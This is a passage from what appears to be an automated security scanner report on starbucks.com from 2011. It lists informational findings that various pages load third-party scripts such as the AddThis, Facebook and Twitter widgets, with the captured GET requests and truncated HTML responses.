...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.35. http://www.starbucks.com/coffee/via/instant-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/via/instant-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:11:23 GMT
Connection: close
Content-Length: 50406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.36. http://www.starbucks.com/coffee/whole-bean-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:10:51 GMT
Connection: close
Content-Length: 50786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.37. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee/africa-arabia HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:10:03 GMT
Connection: close
Content-Length: 41819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.38. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/asia-pacific

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee/asia-pacific HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:10:08 GMT
Connection: close
Content-Length: 41238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.39. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:10:31 GMT
Connection: close
Content-Length: 43595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.40. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:10:00 GMT
Connection: close
Content-Length: 40159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.41. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:09:59 GMT
Connection: close
Content-Length: 40514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.42. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee/latin-america HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:10:02 GMT
Connection: close
Content-Length: 46491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.43. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee/multi-region-blends HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:10:17 GMT
Connection: close
Content-Length: 42728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.44. http://www.starbucks.com/coffeehouse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:18 GMT
Connection: close
Content-Length: 52507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.45. http://www.starbucks.com/coffeehouse/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /coffeehouse/community HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:30 GMT
Connection: close
Content-Length: 41445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<!-- Facebook Fan Box -->
               <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- Twitter Widget -->
               <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.46. http://www.starbucks.com/coffeehouse/community/mystarbucksidea  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community/mystarbucksidea

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/community/mystarbucksidea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:54 GMT
Connection: close
Content-Length: 41478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.47. http://www.starbucks.com/coffeehouse/entertainment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/entertainment

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/entertainment HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:33 GMT
Connection: close
Content-Length: 53938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.48. http://www.starbucks.com/coffeehouse/mobile-apps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/mobile-apps HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:52 GMT
Connection: close
Content-Length: 40391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.49. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/mystarbucks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/mobile-apps/mystarbucks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:04 GMT
Connection: close
Content-Length: 37791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.50. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:07 GMT
Connection: close
Content-Length: 38296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.51. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile-bb

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile-bb HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:03 GMT
Connection: close
Content-Length: 39299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.52. http://www.starbucks.com/coffeehouse/store-design  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/store-design

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/store-design HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:55 GMT
Connection: close
Content-Length: 43428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.53. http://www.starbucks.com/coffeehouse/wireless-internet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/wireless-internet HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:45 GMT
Connection: close
Content-Length: 37834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.54. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada  previous  next

Summary

